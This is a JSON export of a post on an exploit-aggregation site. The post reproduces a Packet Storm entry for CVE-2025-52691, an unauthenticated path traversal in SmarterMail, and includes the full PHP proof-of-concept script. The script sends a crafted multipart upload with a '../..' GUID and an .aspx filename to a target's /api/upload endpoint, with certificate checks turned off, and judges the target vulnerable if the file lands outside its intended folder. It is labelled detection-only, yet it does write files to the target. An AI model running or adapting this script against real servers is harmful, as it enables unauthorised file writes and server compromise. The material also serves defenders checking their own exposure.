{"id":41637,"date":"2026-02-19T10:38:11","date_gmt":"2026-02-19T10:38:11","guid":{"rendered":"http:\/\/localhost\/?p=41637"},"modified":"2026-02-19T10:38:11","modified_gmt":"2026-02-19T10:38:11","slug":"smartermail-163698916341-path-traversal","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41637","title":{"rendered":"\ud83d\udcc4 SmarterMail 16.3.6989.16341 Path Traversal_PACKETSTORM:215889"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-19T16:29:03&#8243;,&#8221;description&#8221;:&#8221;This PHP proof of concept is a detection-only artifact generator for CVE-2025-52691 affecting SmarterMail version 16.3.6989.16341. It sends a crafted multipart upload request to the \/api\/upload endpoint, leveraging a path traversal condition in the&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-19T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-19T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 SmarterMail 16.3.6989.16341 Path Traversal&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215889&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-52691&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : SmarterMail 16.3.6989.16341 Detection Artifact Generator Unauthenticated Path Traversal vulnerability                       |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.smartertools.com\/                                                                                               |\\n    =============================================================================================================================================\\n    \\n    [+] Summary: This PHP proof-of-concept is a detection-only artifact generator for CVE-2025-52691 affecting SmarterMail. \\n                 It sends a crafted multipart upload request to the \/api\/upload endpoint, leveraging a path traversal \\n    \\t\\t\\t condition in the contextData GUID to determine whether the target is vulnerable. \\n    \\t\\t\\t The script analyzes HTTP responses and returned JSON keys to classify the target as Vulnerable, \\n    \\t\\t\\t Not Vulnerable (patched), or Unknown, without executing payloads or performing exploitation. \\n                 It is intended solely for validation and security assessment purposes.\\n    \\n    [+] POC : php poc.php -H https:\/\/target.com\\n    \\n    \\u003c?php\\n    \\n    error_reporting(E_ALL);\\n    ini_set(&#8216;display_errors&#8217;, 0);\\n    \\n    $banner = \\u003c\\u003c\\u003cBANNER\\n    \\n     \u2588\u2588\u2557\u2588\u2588\u2588\u2557   \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557   \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557  \u2588\u2588\u2557\u2588\u2588\u2557  \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \\n     \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\\n     \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588   \u2588\u2554\u255d\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\\n     \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551   \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\\n     \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551  \u2588\u2588\u2557\u2588\u2588\u2551  \u2588\u2588\u2551\\n     \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\\n            watchTowr-vs-SmarterMail-CVE-2025-52691.php\\n            (*) CVE-2025-52691 Detection Artifact Generator\\n    \\n    BANNER;\\n    \\n    function generateRandomName(int $length = 6): string {\\n        $chars = &#8216;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&#8217;;\\n        $out = &#8221;;\\n        for ($i = 0; $i \\u003c $length; $i++) {\\n            $out .= $chars[random_int(0, strlen($chars) &#8211; 1)];\\n        }\\n        return $out;\\n    }\\n    \\n    function dag(string $host): void {\\n    \\n        $name     = generateRandomName();\\n        $url      = $host . &#8216;api\/upload&#8217;;\\n        $boundary = &#8216;&#8212;-WebKitFormBoundary&#8217; . bin2hex(random_bytes(8));\\n        $data  = \\&#8221;&#8211;{$boundary}\\\\r\\\\n\\&#8221;;\\n        $data .= \\&#8221;Content-Disposition: form-data; name=\\\\\\&#8221;context\\\\\\&#8221;\\\\r\\\\n\\\\r\\\\nattachment\\\\r\\\\n\\&#8221;;\\n        $data .= \\&#8221;&#8211;{$boundary}\\\\r\\\\n\\&#8221;;\\n        $data .= \\&#8221;Content-Disposition: form-data; name=\\\\\\&#8221;resumableIdentifier\\\\\\&#8221;\\\\r\\\\n\\\\r\\\\nfakeID\\\\r\\\\n\\&#8221;;\\n        $data .= \\&#8221;&#8211;{$boundary}\\\\r\\\\n\\&#8221;;\\n        $data .= \\&#8221;Content-Disposition: form-data; name=\\\\\\&#8221;resumableFilename\\\\\\&#8221;\\\\r\\\\n\\\\r\\\\nfakefile.aspx\\\\r\\\\n\\&#8221;;\\n        $data .= \\&#8221;&#8211;{$boundary}\\\\r\\\\n\\&#8221;;\\n        $data .= \\&#8221;Content-Disposition: form-data; name=\\\\\\&#8221;contextData\\\\\\&#8221;\\\\r\\\\n\\\\r\\\\n\\&#8221;;\\n        $data .= \\&#8221;{\\\\\\&#8221;guid\\\\\\&#8221;:\\\\\\&#8221;dag\/..\/..\/{$name}\\\\\\&#8221;}\\\\r\\\\n\\&#8221;;\\n        $data .= \\&#8221;&#8211;{$boundary}\\\\r\\\\n\\&#8221;;\\n        $data .= \\&#8221;Content-Disposition: form-data; name=\\\\\\&#8221;whatever\\\\\\&#8221;; filename=\\\\\\&#8221;fake.jpg\\\\\\&#8221;\\\\r\\\\n\\\\r\\\\n\\&#8221;;\\n        $data .= \\&#8221;Detection Artifact Generator\\\\r\\\\n\\&#8221;;\\n        $data .= \\&#8221;&#8211;{$boundary}&#8211;\\\\r\\\\n\\&#8221;;\\n    \\n        $ch = curl_init($url);\\n        curl_setopt_array($ch, [\\n            CURLOPT_POST            =\\u003e true,\\n            CURLOPT_POSTFIELDS      =\\u003e $data,\\n            CURLOPT_RETURNTRANSFER  =\\u003e true,\\n            CURLOPT_HTTPHEADER      =\\u003e [\\n                \\&#8221;Content-Type: multipart\/form-data; boundary={$boundary}\\&#8221;,\\n                \\&#8221;Content-Length: \\&#8221; . strlen($data)\\n            ],\\n            CURLOPT_SSL_VERIFYPEER  =\\u003e false,\\n            CURLOPT_SSL_VERIFYHOST  =\\u003e false,\\n            CURLOPT_TIMEOUT         =\\u003e 15,\\n        ]);\\n    \\n        $response = curl_exec($ch);\\n        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n        curl_close($ch);\\n    \\n        if ($response === false || empty($response)) {\\n            echo \\&#8221;[!] Request failed\\\\n\\&#8221;;\\n            return;\\n        }\\n    \\n        $json = json_decode($response, true);\\n    \\n        if (is_string($json)) {\\n            $json = json_decode($json, true);\\n        }\\n    \\n        if (!is_array($json)) {\\n            echo \\&#8221;[+\/-] UNKNOWN MESSAGE &#8211; please verify manually\\\\n\\&#8221;;\\n            return;\\n        }\\n    \\n        if ($httpCode === 200 \\u0026\\u0026 isset($json[&#8216;key&#8217;])) {\\n            if (stripos($json[&#8216;key&#8217;], $name) !== false) {\\n                echo \\&#8221;[+] VULNERABLE &#8211; file \\&#8221; . basename($json[&#8216;key&#8217;]) . \\&#8221; got uploaded\\\\n\\&#8221;;\\n                return;\\n            }\\n        }\\n    \\n        if ($httpCode === 400 \\u0026\\u0026 ($json[&#8216;message&#8217;] ?? &#8221;) === &#8216;INVALID_GUID&#8217;) {\\n            echo \\&#8221;[-] NOT VULNERABLE &#8211; patch applied (INVALID_GUID)\\\\n\\&#8221;;\\n            return;\\n        }\\n    \\n        echo \\&#8221;[+\/-] UNKNOWN MESSAGE &#8211; please verify manually\\\\n\\&#8221;;\\n    }\\n    \\n    echo $banner;\\n    \\n    $options = getopt(\\&#8221;H:\\&#8221;, [\\&#8221;host:\\&#8221;]);\\n    \\n    if (!isset($options[&#8216;H&#8217;]) \\u0026\\u0026 !isset($options[&#8216;host&#8217;])) {\\n        echo \\&#8221;Usage  : php poc.php -H \\u003chost\\u003e\\\\n\\&#8221;;\\n        echo \\&#8221;Example: php poc.php -H https:\/\/smartermail.lab\/\\\\n\\&#8221;;\\n        exit(1);\\n    }\\n    \\n    $host = rtrim($options[&#8216;H&#8217;] ?? $options[&#8216;host&#8217;], &#8216;\/&#8217;) . &#8216;\/&#8217;;\\n    dag($host);\\n    \\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215889&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:10,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215889\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-19T16:29:03&#8243;,&#8221;description&#8221;:&#8221;This PHP proof of concept is a detection-only artifact generator for CVE-2025-52691 affecting SmarterMail version 16.3.6989.16341. It sends a crafted multipart upload request to the&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-41637","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 SmarterMail 16.3.6989.16341 Path Traversal_PACKETSTORM:215889 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41637\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 SmarterMail 16.3.6989.16341 Path Traversal_PACKETSTORM:215889 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-19T16:29:03&#8243;,&#8221;description&#8221;:&#8221;This PHP proof of concept is a detection-only artifact generator for CVE-2025-52691 affecting SmarterMail version 16.3.6989.16341. It sends a crafted multipart upload request to the...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41637\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-19T10:38:11+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41637#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41637\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 SmarterMail 16.3.6989.16341 Path Traversal_PACKETSTORM:215889\",\"datePublished\":\"2026-02-19T10:38:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41637\"},\"wordCount\":781,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41637#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41637\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41637\",\"name\":\"\ud83d\udcc4 SmarterMail 16.3.6989.16341 Path Traversal_PACKETSTORM:215889 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-19T10:38:11+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41637#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41637\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41637#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 SmarterMail 16.3.6989.16341 Path Traversal_PACKETSTORM:215889\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 SmarterMail 16.3.6989.16341 Path Traversal_PACKETSTORM:215889 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41637","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 SmarterMail 16.3.6989.16341 Path Traversal_PACKETSTORM:215889 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-19T16:29:03&#8243;,&#8221;description&#8221;:&#8221;This PHP proof of concept is a detection-only artifact generator for CVE-2025-52691 affecting SmarterMail version 16.3.6989.16341. It sends a crafted multipart upload request to the...","og_url":"https:\/\/zero.redgem.net\/?p=41637","og_site_name":"zero redgem","article_published_time":"2026-02-19T10:38:11+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41637#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41637"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 SmarterMail 16.3.6989.16341 Path Traversal_PACKETSTORM:215889","datePublished":"2026-02-19T10:38:11+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41637"},"wordCount":781,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-10.0","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41637#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41637","url":"https:\/\/zero.redgem.net\/?p=41637","name":"\ud83d\udcc4 SmarterMail 16.3.6989.16341 Path Traversal_PACKETSTORM:215889 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-19T10:38:11+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41637#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41637"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41637#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 SmarterMail 16.3.6989.16341 Path Traversal_PACKETSTORM:215889"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41637","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41637"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41637\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41637"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41637"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41637"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}